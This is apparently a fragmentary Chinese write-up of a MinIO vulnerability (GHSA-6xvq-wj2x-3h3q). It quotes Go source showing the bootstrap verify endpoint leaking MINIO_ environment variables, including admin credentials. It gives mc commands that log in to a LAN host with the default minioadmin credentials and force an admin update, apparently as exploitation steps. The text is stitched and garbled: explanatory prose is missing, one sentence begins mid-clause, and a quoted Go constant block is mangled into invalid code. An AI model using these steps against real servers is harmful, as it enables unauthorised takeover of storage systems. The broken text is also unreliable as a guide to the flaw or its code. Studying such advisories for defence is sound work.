// minio/cmd/bootstrap-peer-server.go
func (b *bootstrapRESTServer) VerifyHandler(w http.ResponseWriter, r *http.Request) {
ctx := newContext(r, w, "VerifyHandler")
cfg := getServerSystemCfg()
logger.LogIf(ctx, json.NewEncoder(w).Encode(&cfg))
}// minio/cmd/bootstrap-peer-server.go
func getServerSystemCfg() ServerSystemConfig {
envs := env.List("MINIO_")
envValues := make(map[string]string, len(envs))
for _, envK := range envs {
// skip certain environment variables as part
// of the whitelist and could be configured
// differently on each nodes, update skipEnvs()
// map if there are such environment values
if _, ok := skipEnvs[envK]; ok {
continue
}
envValues[envK] = env.Get(envK, "")
}
return ServerSystemConfig{
MinioEndpoints: globalEndpoints,
MinioEnv: envValues,
}
}
MINIO_ROOT_USER
和MINIO_ROOT_PASSWORD
,那么Minio就会启动默认的账号密码minioadmin
,这时候通过信息泄露会发现读取不到管理员的账号密码,可以判断存在默认口令。mc alias set myminio http://192.168.31.8:9000 minioadmin miniopassword
mc admin update myminio -y
// minio/cmd/update.go
const (
minioReleaseTagTimeLayout = "2006-01-02T15-04-05Z"
minioOSARCH = runtime.GOOS + "-" + runtime.GOARCH
minioReleaseURL = "https://dl.min.io/server/minio/release/" + minioOSARCH + SlashSeparator envMinisignPubKey = "MINIO_UPDATE_MINISIGN_PUBKEY"
updateTimeout = 10 * time.Second
)
1.https://github.com/minio/minio/security/advisories/GHSA-6xvq-wj2x-3h3q
2.https://github.com/minio/minio
3.https://min.io/docs/minio/linux/reference/minio-mc-admin/mc-admin-update.html